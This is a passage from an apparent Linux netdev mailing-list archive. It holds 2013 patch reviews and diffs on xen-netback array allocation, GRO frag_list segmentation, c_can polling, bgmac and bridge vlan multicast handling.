have the <mach/*> hierarchy in mach-shmobile/include/mach/*, and
grep:ing around this seems totally unnecessary, I think it would be
easy to produce a patch set eliminating <mach/*> from shmobile.
(Usually we will just move all the headers down into the
mach-shmobile folder.)
Yours,
Linus Walleij
^ permalink raw reply
* Re: [PATCH v2] can: c_can: Speed up rx_poll function
From: Joe Perches @ 2013-10-29 16:24 UTC (permalink / raw)
To: Markus Pargmann
Cc: Marc Kleine-Budde, Wolfgang Grandegger, linux-can, netdev,
linux-kernel, kernel
In-Reply-To: <20131029085853.GC20839@pengutronix.de>
On Tue, 2013-10-29 at 09:58 +0100, Markus Pargmann wrote:
> On Tue, Oct 29, 2013 at 01:34:48AM -0700, Joe Perches wrote:
> > On Tue, 2013-10-29 at 09:27 +0100, Markus Pargmann wrote:
> > > This patch speeds up the rx_poll function by reducing the number of
> > > register reads.
> > []
> > > 125kbit:
> > > Function Hit Time Avg s^2
> > > -------- --- ---- --- ---
> > > c_can_do_rx_poll 63960 10168178 us 158.977 us 1493056 us
> > > With patch:
> > > c_can_do_rx_poll 63939 4268457 us 66.758 us 818790.9 us
> > >
> > > 1Mbit:
> > > Function Hit Time Avg s^2
> > > -------- --- ---- --- ---
> > > c_can_do_rx_poll 69489 30049498 us 432.435 us 9271851 us
> > > With patch:
> > > c_can_do_rx_poll 103034 24220362 us 235.071 us 6016656 us
[]
> Yes I just measured the timings again:
[]
> ./perf_can_test.sh 125000 30
[]
> c_can_do_rx_poll 63941 3764057 us 58.867 us 776162.2 us
Good, it's slightly faster still.
> ./perf_can_test.sh 1000000 30
[]
> c_can_do_rx_poll 207109 24322185 us 117.436 us 171469047 us
[]
> It is interesting that the number of hits for c_can_do_rx_poll is twice as much
> as it was with find_next_bit.
How is this possible? Any idea?
^ permalink raw reply
* Re: [PATCH 00/19] Enable various Renesas drivers on all ARM platforms
From: Mark Brown @ 2013-10-29 16:04 UTC (permalink / raw)
To: Simon Horman
Cc: linux-fbdev, Wolfram Sang, Linus Walleij, Guennadi Liakhovetski,
Thierry Reding, linux-mtd, linux-i2c, Laurent Pinchart,
Vinod Koul, Joerg Roedel, linux-sh, Magnus Damm, Eduardo Valentin,
Tomi Valkeinen, linux-serial, linux-input, Zhang Rui, Chris Ball,
Jean-Christophe Plagniol-Villard, linux-media, linux-pwm,
Samuel Ortiz, linux-pm, Ian Molton, linux-arm-ker
In-Reply-To: <20131029060427.GF11580@verge.net.au>
[-- Attachment #1.1: Type: text/plain, Size: 223 bytes --]
On Tue, Oct 29, 2013 at 03:04:27PM +0900, Simon Horman wrote:
> I think this is a step in a good direction.
> However, I think it would be even better if the architecture dependency was
> removed completely.
Yes, please.
^ permalink raw reply
* Re: [PATCH net-next] xen-netback: allocate xenvif arrays using vzalloc.
From: Wei Liu @ 2013-10-29 15:50 UTC (permalink / raw)
To: Joby Poriyath
Cc: netdev, wei.liu2, ian.campbell, xen-devel, andrew.bennieston,
david.vrabel, malcolm.crossley
In-Reply-To: <20131029152628.GA3065@citrix.com>
On Tue, Oct 29, 2013 at 03:27:13PM +0000, Joby Poriyath wrote:
[...]
> +
> +static int allocate_xenvif_arrays(struct xenvif *vif)
> +{
> + vif->mmap_pages = vif->pending_tx_info = NULL;
> + vif->tx_copy_ops = vif->grant_copy_op = vif->meta = NULL;
> +
> + vif->mmap_pages = vzalloc(MAX_PENDING_REQS * sizeof(struct page *));
> + if (! vif->mmap_pages)
No space after "!".
> + goto fail;
> +
> + vif->pending_tx_info = vzalloc(MAX_PENDING_REQS *
> + sizeof(struct pending_tx_info));
> + if (! vif->pending_tx_info)
> + goto fail;
> +
> + vif->tx_copy_ops = vzalloc(2 * MAX_PENDING_REQS *
> + sizeof(struct gnttab_copy));
> + if (! vif->tx_copy_ops)
> + goto fail;
> +
> + vif->grant_copy_op = vzalloc(2 * XEN_NETIF_RX_RING_SIZE *
> + sizeof(struct gnttab_copy));
> + if (! vif->grant_copy_op)
> + goto fail;
> +
> + vif->meta = vzalloc(2 * XEN_NETIF_RX_RING_SIZE *
> + sizeof(struct xenvif_rx_meta));
Indentation.
> + if (! vif->meta)
> + goto fail;
> +
> + return 0;
> +
> +fail:
> + deallocate_xenvif_arrays(vif);
> + return 1;
return -ENOMEM;
> +}
> +
> struct xenvif *xenvif_alloc(struct device *parent, domid_t domid,
> unsigned int handle)
> {
> @@ -313,6 +367,12 @@ struct xenvif *xenvif_alloc(struct device *parent, domid_t domid,
> vif->ip_csum = 1;
> vif->dev = dev;
>
> + if (allocate_xenvif_arrays(vif)) {
> + netdev_warn(dev, "Could not create device: out of memory\n");
> + free_netdev(dev);
> + return ERR_PTR(-ENOMEM);
> + }
> +
> vif->credit_bytes = vif->remaining_credit = ~0UL;
> vif->credit_usec = 0UL;
> init_timer(&vif->credit_timeout);
> @@ -484,6 +544,7 @@ void xenvif_free(struct xenvif *vif)
>
> unregister_netdev(vif->dev);
>
> + deallocate_xenvif_arrays(vif);
> free_netdev(vif->dev);
>
> module_put(THIS_MODULE);
> diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c
> index 828fdab..34c0c05 100644
> --- a/drivers/net/xen-netback/netback.c
> +++ b/drivers/net/xen-netback/netback.c
> @@ -602,12 +602,12 @@ void xenvif_rx_action(struct xenvif *vif)
> break;
> }
>
> - BUG_ON(npo.meta_prod > ARRAY_SIZE(vif->meta));
> + BUG_ON(npo.meta_prod > 2*XEN_NETIF_RX_RING_SIZE);
>
> if (!npo.copy_prod)
> return;
>
> - BUG_ON(npo.copy_prod > ARRAY_SIZE(vif->grant_copy_op));
> + BUG_ON(npo.copy_prod > 2*XEN_NETIF_RX_RING_SIZE);
It's better to
#define XEN_NETBK_RX_ARRAY_SIZE (2*XEN_NETIF_RX_RING_SIZE)
And use it consistently in code (allocation / comparison). Otherwise
it's easy to change one site and forget about others.
> gnttab_batch_copy(vif->grant_copy_op, npo.copy_prod);
>
> while ((skb = __skb_dequeue(&rxq)) != NULL) {
> @@ -1571,7 +1571,7 @@ static unsigned xenvif_tx_build_gops(struct xenvif *vif)
>
> vif->tx.req_cons = idx;
>
> - if ((gop-vif->tx_copy_ops) >= ARRAY_SIZE(vif->tx_copy_ops))
> + if ((gop-vif->tx_copy_ops) >= 2*MAX_PENDING_REQS)
Same here.
#define XEN_NETBK_TX_ARRAY_SIZE
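The two defines suggested above can be sketched in plain user-space C as
follows. This is only an illustration: the ring sizes are made-up stand-in
values, struct copy_op stands in for struct gnttab_copy, and the helper
names are hypothetical. The point is that allocation and every bounds
check read the same macro.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

/* Hypothetical stand-in values; the real ones come from the Xen headers. */
#define XEN_NETIF_RX_RING_SIZE 256
#define MAX_PENDING_REQS 256

/* One definition per array, shared by allocation and comparison sites. */
#define XEN_NETBK_RX_ARRAY_SIZE (2 * XEN_NETIF_RX_RING_SIZE)
#define XEN_NETBK_TX_ARRAY_SIZE (2 * MAX_PENDING_REQS)

struct copy_op { int dummy; };	/* stand-in for struct gnttab_copy */

/* Allocate the RX copy-op array using the shared size macro. */
static struct copy_op *alloc_rx_copy_ops(void)
{
	return calloc(XEN_NETBK_RX_ARRAY_SIZE, sizeof(struct copy_op));
}

/* Inverse of the BUG_ON() condition: true while prod is within bounds. */
static int rx_prod_in_bounds(size_t prod)
{
	return prod <= XEN_NETBK_RX_ARRAY_SIZE;
}

/* Same test as the TX loop exit: true once the op array is full. */
static int tx_ops_full(size_t used)
{
	return used >= XEN_NETBK_TX_ARRAY_SIZE;
}
```

With this layout, changing a ring multiplier means touching one line, and
the allocation and the checks cannot drift apart.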
Wei.
^ permalink raw reply
* Re: [PATCH net-next] xen-netback: allocate xenvif arrays using vzalloc.
From: Eric Dumazet @ 2013-10-29 15:43 UTC (permalink / raw)
To: Joby Poriyath
Cc: netdev, wei.liu2, ian.campbell, xen-devel, andrew.bennieston,
david.vrabel, malcolm.crossley
In-Reply-To: <20131029152628.GA3065@citrix.com>
On Tue, 2013-10-29 at 15:27 +0000, Joby Poriyath wrote:
> This will reduce memory pressure when allocating struct xenvif.
>
> The size of xenvif struct has increased from 168 to 36632 bytes (on x86-32).
> See commit b3f980bd827e6e81a050c518d60ed7811a83061d. This resulted in
> occasional netdev allocation failure in dom0 with 752MiB RAM, due to
> fragmented memory.
This looks overkill.
Replacing a single allocation of ~36 KB with 5 vmalloc() calls suggests you
did not really try other things...
This should be done generically in alloc_netdev_mqs()
Take a look at commit 60877a32bce00041
("net: allow large number of tx queues")
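As a rough user-space sketch of the generic approach hinted at here: try a
regular contiguous allocation first and fall back to a virtually contiguous
one only when that fails, remembering which path was taken so the free side
can match it. That the referenced commit works this way is my reading of
it, not something stated in this thread. Everything below (CONTIG_LIMIT,
contig_zalloc, virt_zalloc, struct big_buf) is a hypothetical stand-in, not
a kernel API.

```c
#include <assert.h>
#include <stdlib.h>

/* Hypothetical threshold above which the "contiguous" allocator fails,
 * standing in for a fragmented kernel heap. */
#define CONTIG_LIMIT 4096

enum backing { BACKING_NONE, BACKING_CONTIG, BACKING_VIRT };

struct big_buf {
	void *ptr;
	enum backing kind;	/* remembers which allocator to undo */
};

/* Stand-in for a kzalloc()-style call: refuses large requests. */
static void *contig_zalloc(size_t size)
{
	return size <= CONTIG_LIMIT ? calloc(1, size) : NULL;
}

/* Stand-in for a vzalloc()-style call: accepts any size. */
static void *virt_zalloc(size_t size)
{
	return calloc(1, size);
}

/* Try the cheap contiguous path first, then fall back. */
static struct big_buf big_zalloc(size_t size)
{
	struct big_buf b = { contig_zalloc(size), BACKING_CONTIG };

	if (!b.ptr) {
		b.ptr = virt_zalloc(size);
		b.kind = b.ptr ? BACKING_VIRT : BACKING_NONE;
	}
	return b;
}

/* In the kernel the free routine would be chosen by b->kind. */
static void big_free(struct big_buf *b)
{
	free(b->ptr);
	b->ptr = NULL;
	b->kind = BACKING_NONE;
}
```

The small request stays on the fast path, and only the oversized one pays
for the fallback, which is the property a single generic helper would give
every driver at once.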
^ permalink raw reply
* Realtek RTL8102E registers
From: Ivan Frederiks @ 2013-10-29 15:05 UTC (permalink / raw)
To: Linux r8169 crew
Hello!
I met troubles with RTL8102E operation (you can find detailed
description below). I suppose that those troubles are related to chip
misconfiguration. Maybe you have access to RTL8102E register
description? If yes, would you be so kind to share it with me?
Thank you in advance,
Ivan Frederiks
Embedded developer
Speech Technology Center
Phone: +7-812-331-0665, ext. 6123, 6942
Fax: +7-812-327-9297
P.S.
Issue description:
I'm currently working with a custom motherboard equipped with 2 RTL8102E
ICs and an Intel x86 SOM. SOM runs 32-bit Linux (Arch or Ubuntu).
By default I use r8169 driver. I know that Ethernet link is up (I
checked it with an oscilloscope and I see that RTL8102E link LEDs are
on). In most cases everything works fine. But sometimes driver reports
that link is down. After a power cycle the driver reports that the link is up.
When I replace driver with r8101, it always reports that link is up, but
I observe other issues.
^ permalink raw reply
* [PATCH net-next] xen-netback: allocate xenvif arrays using vzalloc.
From: Joby Poriyath @ 2013-10-29 15:27 UTC (permalink / raw)
To: netdev
Cc: wei.liu2, ian.campbell, xen-devel, andrew.bennieston,
david.vrabel, malcolm.crossley
This will reduce memory pressure when allocating struct xenvif.
The size of xenvif struct has increased from 168 to 36632 bytes (on x86-32).
See commit b3f980bd827e6e81a050c518d60ed7811a83061d. This resulted in
occasional netdev allocation failure in dom0 with 752MiB RAM, due to
fragmented memory.
Signed-off-by: Joby Poriyath <joby.poriyath@citrix.com>
Signed-off-by: Andrew J. Bennieston <andrew.bennieston@citrix.com>
---
drivers/net/xen-netback/common.h | 10 +++---
drivers/net/xen-netback/interface.c | 61 +++++++++++++++++++++++++++++++++++
drivers/net/xen-netback/netback.c | 6 ++--
3 files changed, 69 insertions(+), 8 deletions(-)
diff --git a/drivers/net/xen-netback/common.h b/drivers/net/xen-netback/common.h
index 55b8dec..82515a3 100644
--- a/drivers/net/xen-netback/common.h
+++ b/drivers/net/xen-netback/common.h
@@ -114,17 +114,17 @@ struct xenvif {
char tx_irq_name[IFNAMSIZ+4]; /* DEVNAME-tx */
struct xen_netif_tx_back_ring tx;
struct sk_buff_head tx_queue;
- struct page *mmap_pages[MAX_PENDING_REQS];
+ struct page **mmap_pages; /* [MAX_PENDING_REQS]; */
pending_ring_idx_t pending_prod;
pending_ring_idx_t pending_cons;
u16 pending_ring[MAX_PENDING_REQS];
- struct pending_tx_info pending_tx_info[MAX_PENDING_REQS];
+ struct pending_tx_info *pending_tx_info; /* [MAX_PENDING_REQS]; */
/* Coalescing tx requests before copying makes number of grant
* copy ops greater or equal to number of slots required. In
* worst case a tx request consumes 2 gnttab_copy.
*/
- struct gnttab_copy tx_copy_ops[2*MAX_PENDING_REQS];
+ struct gnttab_copy *tx_copy_ops; /* [2*MAX_PENDING_REQS]; */
/* Use kthread for guest RX */
@@ -147,8 +147,8 @@ struct xenvif {
* head/fragment page uses 2 copy operations because it
* straddles two buffers in the frontend.
*/
- struct gnttab_copy grant_copy_op[2*XEN_NETIF_RX_RING_SIZE];
- struct xenvif_rx_meta meta[2*XEN_NETIF_RX_RING_SIZE];
+ struct gnttab_copy *grant_copy_op; /* [2*XEN_NETIF_RX_RING_SIZE]; */
+ struct xenvif_rx_meta *meta; /* [2*XEN_NETIF_RX_RING_SIZE]; */
u8 fe_dev_addr[6];
diff --git a/drivers/net/xen-netback/interface.c b/drivers/net/xen-netback/interface.c
index e4aa267..d4a9807 100644
--- a/drivers/net/xen-netback/interface.c
+++ b/drivers/net/xen-netback/interface.c
@@ -288,6 +288,60 @@ static const struct net_device_ops xenvif_netdev_ops = {
.ndo_validate_addr = eth_validate_addr,
};
+static void deallocate_xenvif_arrays(struct xenvif *vif)
+{
+ vfree(vif->mmap_pages);
+ vif->mmap_pages = NULL;
+
+ vfree(vif->pending_tx_info);
+ vif->pending_tx_info = NULL;
+
+ vfree(vif->tx_copy_ops);
+ vif->tx_copy_ops = NULL;
+
+ vfree(vif->grant_copy_op);
+ vif->grant_copy_op = NULL;
+
+ vfree(vif->meta);
+ vif->meta = NULL;
+}
+
+static int allocate_xenvif_arrays(struct xenvif *vif)
+{
+ vif->mmap_pages = vif->pending_tx_info = NULL;
+ vif->tx_copy_ops = vif->grant_copy_op = vif->meta = NULL;
+
+ vif->mmap_pages = vzalloc(MAX_PENDING_REQS * sizeof(struct page *));
+ if (! vif->mmap_pages)
+ goto fail;
+
+ vif->pending_tx_info = vzalloc(MAX_PENDING_REQS *
+ sizeof(struct pending_tx_info));
+ if (! vif->pending_tx_info)
+ goto fail;
+
+ vif->tx_copy_ops = vzalloc(2 * MAX_PENDING_REQS *
+ sizeof(struct gnttab_copy));
+ if (! vif->tx_copy_ops)
+ goto fail;
+
+ vif->grant_copy_op = vzalloc(2 * XEN_NETIF_RX_RING_SIZE *
+ sizeof(struct gnttab_copy));
+ if (! vif->grant_copy_op)
+ goto fail;
+
+ vif->meta = vzalloc(2 * XEN_NETIF_RX_RING_SIZE *
+ sizeof(struct xenvif_rx_meta));
+ if (! vif->meta)
+ goto fail;
+
+ return 0;
+
+fail:
+ deallocate_xenvif_arrays(vif);
+ return 1;
+}
+
struct xenvif *xenvif_alloc(struct device *parent, domid_t domid,
unsigned int handle)
{
@@ -313,6 +367,12 @@ struct xenvif *xenvif_alloc(struct device *parent, domid_t domid,
vif->ip_csum = 1;
vif->dev = dev;
+ if (allocate_xenvif_arrays(vif)) {
+ netdev_warn(dev, "Could not create device: out of memory\n");
+ free_netdev(dev);
+ return ERR_PTR(-ENOMEM);
+ }
+
vif->credit_bytes = vif->remaining_credit = ~0UL;
vif->credit_usec = 0UL;
init_timer(&vif->credit_timeout);
@@ -484,6 +544,7 @@ void xenvif_free(struct xenvif *vif)
unregister_netdev(vif->dev);
+ deallocate_xenvif_arrays(vif);
free_netdev(vif->dev);
module_put(THIS_MODULE);
diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c
index 828fdab..34c0c05 100644
--- a/drivers/net/xen-netback/netback.c
+++ b/drivers/net/xen-netback/netback.c
@@ -602,12 +602,12 @@ void xenvif_rx_action(struct xenvif *vif)
break;
}
- BUG_ON(npo.meta_prod > ARRAY_SIZE(vif->meta));
+ BUG_ON(npo.meta_prod > 2*XEN_NETIF_RX_RING_SIZE);
if (!npo.copy_prod)
return;
- BUG_ON(npo.copy_prod > ARRAY_SIZE(vif->grant_copy_op));
+ BUG_ON(npo.copy_prod > 2*XEN_NETIF_RX_RING_SIZE);
gnttab_batch_copy(vif->grant_copy_op, npo.copy_prod);
while ((skb = __skb_dequeue(&rxq)) != NULL) {
@@ -1571,7 +1571,7 @@ static unsigned xenvif_tx_build_gops(struct xenvif *vif)
vif->tx.req_cons = idx;
- if ((gop-vif->tx_copy_ops) >= ARRAY_SIZE(vif->tx_copy_ops))
+ if ((gop-vif->tx_copy_ops) >= 2*MAX_PENDING_REQS)
break;
}
--
1.7.10.4
^ permalink raw reply related
* Re: [PATCH] bgmac: don't update slot on skb alloc/dma mapping error
From: Nathan Hintz @ 2013-10-29 15:20 UTC (permalink / raw)
To: Rafał Miłecki; +Cc: Network Development
In-Reply-To: <CACna6rzqwz_wp=9ayX6AUZvVSNwdAg-LniXtNwy9eRFDEoNspg@mail.gmail.com>
On Tue, 29 Oct 2013 09:28:56 +0100
Rafał Miłecki <zajec5@gmail.com> wrote:
> 2013/10/29 Nathan Hintz <nlhintz@hotmail.com>:
> > On Tue, 29 Oct 2013 07:52:58 +0100
> > Rafał Miłecki <zajec5@gmail.com> wrote:
> >
> >> 2013/10/29 Nathan Hintz <nlhintz@hotmail.com>:
> >> > Don't update the slot in "bgmac_dma_rx_skb_for_slot" unless both the
> >> > skb alloc and dma mapping are successful; and free the newly allocated
> >> > skb if a dma mapping error occurs. This will prevent an skb leak upon
> >> > returning when an error occurs.
> >>
> >> In case of bgmac_dma_rx_skb_for_slot failure we're giving up anyway
> >> (and freeing everything), but with your patch code is simpler to
> >> understand, so I'm OK with that.
> >>
> >> Acked-by: Rafał Miłecki <zajec5@gmail.com>
> >>
> >
> > I might be misunderstanding; but it in the case of failure, it appeared to me
> > that the currently received packet was dropped and the old skb would continue
> > to be assigned to the slot and would be used to receive future packets (this
> > would continue until bgmac_dma_rx_skb_for_slot was successful).
>
> I was commenting on current usage (.), not my WIP patch
> for bgmac_dma_rx_read :)
>
> Your patch will be helpful for my bgmac_dma_rx_read rework.
>
You're right, I was commenting on your WIP. The commit message should probably
be changed to remove the statement "This will prevent an skb leak upon returning
when an error occurs", as this doesn't occur with the usage in bgmac_dma_alloc.
Unfortunately, I won't be able to send a revised patch until tonight.
Nathan
--
Nathan
^ permalink raw reply
* [PATCH v2 net-next] net: introduce gro_frag_list_enable sysctl
From: Eric Dumazet @ 2013-10-29 15:12 UTC (permalink / raw)
To: Christoph Paasch
Cc: David Miller, Herbert Xu, netdev, Jerry Chu, Michael Dalton
In-Reply-To: <1383051962.5464.25.camel@edumazet-glaptop.roam.corp.google.com>
From: Eric Dumazet <edumazet@google.com>
Christoph Paasch and Jerry Chu reported crashes in skb_segment() caused
by commit 8a29111c7ca6 ("net: gro: allow to build full sized skb")
(Jerry is working on adding native GRO support for tunnels)
skb_segment() only deals with a frag_list chain containing MSS sized
fragments.
This patch adds support for any kind of frag, and adds a new sysctl,
as clearly the GRO layer should avoid building frag_list skbs
on a router, as the segmentation is adding cpu overhead.
Note that we could try to reuse page fragments instead of doing
copy to linear skbs, but this requires a fair amount of work,
and possible truesize nightmares, as we do not track individual
(per page fragment) truesizes.
/proc/sys/net/core/gro_frag_list_enable possible values are :
0 : GRO layer is not allowed to use frag_list to extend skb capacity
1 : GRO layer is allowed to use frag_list, but skb_segment()
automatically sets the sysctl to 0.
2 : GRO is allowed to use frag_list, and skb_segment() won't
clear the sysctl.
Default value is 1 : automatic discovery
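The three values above behave like a small state machine. A minimal
user-space sketch, with hypothetical enum and function names (the patch
itself just tests the integer directly):

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical names for the three sysctl values described above. */
enum {
	GRO_FRAG_LIST_OFF  = 0,	/* never use frag_list */
	GRO_FRAG_LIST_AUTO = 1,	/* use it until skb_segment() objects */
	GRO_FRAG_LIST_ON   = 2,	/* use it, never auto-clear */
};

/* GRO side: may the skb be extended through frag_list? */
static bool gro_may_use_frag_list(int mode)
{
	return mode != GRO_FRAG_LIST_OFF;
}

/* skb_segment() side: new sysctl value after it had to linearize a
 * frag_list skb whose fragments were not MSS sized. */
static int mode_after_segment_fallback(int mode)
{
	return mode == GRO_FRAG_LIST_AUTO ? GRO_FRAG_LIST_OFF : mode;
}
```

Only the automatic mode is ever downgraded; 0 and 2 are left exactly as
the administrator set them.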
Reported-by: Christoph Paasch <christoph.paasch@uclouvain.be>
Reported-by: Jerry Chu <hkchu@google.com>
Cc: Michael Dalton <mwdalton@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
---
v2: added missing sysctl definition in skbuff.c
Documentation/sysctl/net.txt | 19 +++++++++++++++++++
include/linux/netdevice.h | 1 +
net/core/skbuff.c | 31 ++++++++++++++++++++++---------
net/core/sysctl_net_core.c | 10 ++++++++++
4 files changed, 52 insertions(+), 9 deletions(-)
diff --git a/Documentation/sysctl/net.txt b/Documentation/sysctl/net.txt
index 9a0319a82470..8778568ae64e 100644
--- a/Documentation/sysctl/net.txt
+++ b/Documentation/sysctl/net.txt
@@ -87,6 +87,25 @@ sysctl.net.busy_read globally.
Will increase power usage.
Default: 0 (off)
+gro_frag_list_enable
+--------------------
+
+GRO layer can build full size GRO packets (~64K of payload) if it is allowed
+to extend skb using the frag_list pointer. However, this strategy is a win
+on hosts, where TCP flows are terminated. For a router, using frag_list
+skbs is not a win because we have to segment skbs before transmit,
+as most NIC drivers do not support frag_list.
+As soon as one frag_list skb has to be segmented, this sysctl is automatically
+changed from 1 to 0.
+If the value is set to 2, kernel wont change it.
+
+Choices : 0 (off),
+ 1 (on, with automatic change to 0)
+ 2 (on, permanent)
+
+Default: 1 (on, with automatic downgrade on a router)
+
+
rmem_default
------------
diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
index 27f62f746621..b82ff52f301e 100644
--- a/include/linux/netdevice.h
+++ b/include/linux/netdevice.h
@@ -2807,6 +2807,7 @@ extern int netdev_max_backlog;
extern int netdev_tstamp_prequeue;
extern int weight_p;
extern int bpf_jit_enable;
+extern int sysctl_gro_frag_list_enable;
bool netdev_has_upper_dev(struct net_device *dev, struct net_device *upper_dev);
bool netdev_has_any_upper_dev(struct net_device *dev);
diff --git a/net/core/skbuff.c b/net/core/skbuff.c
index 0ab32faa520f..e089cd2782e5 100644
--- a/net/core/skbuff.c
+++ b/net/core/skbuff.c
@@ -74,6 +74,8 @@
struct kmem_cache *skbuff_head_cache __read_mostly;
static struct kmem_cache *skbuff_fclone_cache __read_mostly;
+int sysctl_gro_frag_list_enable __read_mostly = 1;
+
static void sock_pipe_buf_release(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
@@ -2761,7 +2763,7 @@ struct sk_buff *skb_segment(struct sk_buff *skb, netdev_features_t features)
unsigned int len;
__be16 proto;
bool csum;
- int sg = !!(features & NETIF_F_SG);
+ bool sg = !!(features & NETIF_F_SG);
int nfrags = skb_shinfo(skb)->nr_frags;
int err = -ENOMEM;
int i = 0;
@@ -2793,7 +2795,13 @@ struct sk_buff *skb_segment(struct sk_buff *skb, netdev_features_t features)
hsize = len;
if (!hsize && i >= nfrags) {
- BUG_ON(fskb->len != len);
+ if (fskb->len != len) {
+ if (sysctl_gro_frag_list_enable == 1)
+ sysctl_gro_frag_list_enable = 0;
+ hsize = len;
+ sg = false;
+ goto do_linear;
+ }
pos += len;
nskb = skb_clone(fskb, GFP_ATOMIC);
@@ -2812,6 +2820,7 @@ struct sk_buff *skb_segment(struct sk_buff *skb, netdev_features_t features)
skb_release_head_state(nskb);
__skb_push(nskb, doffset);
} else {
+do_linear:
nskb = __alloc_skb(hsize + doffset + headroom,
GFP_ATOMIC, skb_alloc_rx_flag(skb),
NUMA_NO_NODE);
@@ -2838,9 +2847,6 @@ struct sk_buff *skb_segment(struct sk_buff *skb, netdev_features_t features)
nskb->data - tnl_hlen,
doffset + tnl_hlen);
- if (fskb != skb_shinfo(skb)->frag_list)
- goto perform_csum_check;
-
if (!sg) {
nskb->ip_summed = CHECKSUM_NONE;
nskb->csum = skb_copy_and_csum_bits(skb, offset,
@@ -2849,6 +2855,9 @@ struct sk_buff *skb_segment(struct sk_buff *skb, netdev_features_t features)
continue;
}
+ if (fskb != skb_shinfo(skb)->frag_list)
+ goto perform_csum_check;
+
frag = skb_shinfo(nskb)->frags;
skb_copy_from_linear_data_offset(skb, offset,
@@ -2944,9 +2953,11 @@ int skb_gro_receive(struct sk_buff **head, struct sk_buff *skb)
int i = skbinfo->nr_frags;
int nr_frags = pinfo->nr_frags + i;
- if (nr_frags > MAX_SKB_FRAGS)
+ if (unlikely(nr_frags > MAX_SKB_FRAGS)) {
+ if (!sysctl_gro_frag_list_enable)
+ return -E2BIG;
goto merge;
-
+ }
offset -= headlen;
pinfo->nr_frags = nr_frags;
skbinfo->nr_frags = 0;
@@ -2977,9 +2988,11 @@ int skb_gro_receive(struct sk_buff **head, struct sk_buff *skb)
unsigned int first_size = headlen - offset;
unsigned int first_offset;
- if (nr_frags + 1 + skbinfo->nr_frags > MAX_SKB_FRAGS)
+ if (unlikely(nr_frags + 1 + skbinfo->nr_frags > MAX_SKB_FRAGS)) {
+ if (!sysctl_gro_frag_list_enable)
+ return -E2BIG;
goto merge;
-
+ }
first_offset = skb->data -
(unsigned char *)page_address(page) +
offset;
diff --git a/net/core/sysctl_net_core.c b/net/core/sysctl_net_core.c
index cca444190907..2d6aaf6d5838 100644
--- a/net/core/sysctl_net_core.c
+++ b/net/core/sysctl_net_core.c
@@ -24,6 +24,7 @@
static int zero = 0;
static int one = 1;
+static int two = 2;
static int ushort_max = USHRT_MAX;
#ifdef CONFIG_RPS
@@ -360,6 +361,15 @@ static struct ctl_table net_core_table[] = {
.mode = 0644,
.proc_handler = proc_dointvec
},
+ {
+ .procname = "gro_frag_list_enable",
+ .data = &sysctl_gro_frag_list_enable,
+ .maxlen = sizeof(int),
+ .mode = 0644,
+ .proc_handler = proc_dointvec_minmax,
+ .extra1 = &zero,
+ .extra2 = &two,
+ },
{ }
};
^ permalink raw reply related
* Re: Bug in skb_segment: fskb->len != len
From: Eric Dumazet @ 2013-10-29 15:08 UTC (permalink / raw)
To: Herbert Xu; +Cc: Christoph Paasch, netdev
In-Reply-To: <20131029144100.GA28046@gondor.apana.org.au>
On Tue, 2013-10-29 at 22:41 +0800, Herbert Xu wrote:
> On Mon, Oct 28, 2013 at 06:15:08PM -0700, Eric Dumazet wrote:
> > On Mon, 2013-10-28 at 06:21 -0700, Eric Dumazet wrote:
> >
> > > But we also need to fix the skb_segment() bug anyway.
> >
> > Hi Christoph
> >
> > I cooked a minimal patch, could you please try it ?
> >
> > I'll refactor skb_segment() to be smarter for the next release
> > (linux-3.14).
>
> I think this patch is just papering over a deeper issue.
>
> We should either be building skbs in pages, or using frag_list.
> In the latter case each frag_list must be exactly mss bytes,
> except for the last one.
>
> So if we're crashing here it means that we got mixed up on the
> receive side, either because the driver was sending us bogus skbs
> or we're simply buggy.
>
> So we need to figure out why the receive-side (i.e., GRO) is building
> these bogus packets, and not papering over them on the transmit-side.
It looks like you missed a lot of recent changes.
GRO layer was updated to be able to stack two or three sk_buff,
fully populated with page frags.
That's quite mandatory to support line rate for 40Gb links.
We now have to make skb_segment() aware of this, I missed this part.
^ permalink raw reply
* Re: [PATCH] bridge: pass correct vlan id to multicast code
From: Vlad Yasevich @ 2013-10-29 15:00 UTC (permalink / raw)
To: Amos Kong; +Cc: netdev, shemminger, makita.toshiaki
In-Reply-To: <20131029023646.GA2795@amosk.info>
On 10/28/2013 10:36 PM, Amos Kong wrote:
> On Mon, Oct 28, 2013 at 03:45:07PM -0400, Vlad Yasevich wrote:
>> diff --git a/net/bridge/br_multicast.c b/net/bridge/br_multicast.c
>> index 8b0b610..686284f 100644
>> --- a/net/bridge/br_multicast.c
>> +++ b/net/bridge/br_multicast.c
>> @@ -947,7 +947,8 @@ void br_multicast_disable_port(struct net_bridge_port *port)
>>
>> static int br_ip4_multicast_igmp3_report(struct net_bridge *br,
>> struct net_bridge_port *port,
>> - struct sk_buff *skb)
>> + struct sk_buff *skb,
>> + u16 vid)
>> {
>> struct igmpv3_report *ih;
>> struct igmpv3_grec *grec;
>> @@ -957,12 +958,10 @@ static int br_ip4_multicast_igmp3_report(struct net_bridge *br,
>> int type;
>> int err = 0;
>> __be32 group;
>> - u16 vid = 0;
>>
>> if (!pskb_may_pull(skb, sizeof(*ih)))
>> return -EINVAL;
>>
>> - br_vlan_get_tag(skb, &vid);
>
Sorry, missed this question last time.
> After applied the patch, we always use vid in br_dev_xmit()->br_allowed_ingress(),
> is it possible that the vlan of bridge is re-enabled when other
> changed functions are called?
>
If the frame was allowed to enter, then the current configuration should
apply to the frame. If the config changes during the frame
processing we don't really want to use that. Otherwise, you'd get
inconsistent results.
> We can just add a enabled checking before this kind of br_vlan_get_tag()?
>
> if (!br->vlan_enabled)
> br_vlan_get_tag(skb2, &vid);
>
This is sort of what the next patches I am working on do. But we still
want to get the vlan id once and then use it throughout. There is
no need to retrieve it again.
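To illustrate the "read it once, pass it along" point, here is a small
user-space sketch. The structs and function names are hypothetical
stand-ins and not the bridge code; they only show why a later stage should
take the vid as a parameter rather than re-deriving it from a
configuration that may have changed in the meantime.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical stand-ins for the bridge configuration and a frame. */
struct bridge_cfg { bool vlan_enabled; };
struct frame { uint16_t tag; };

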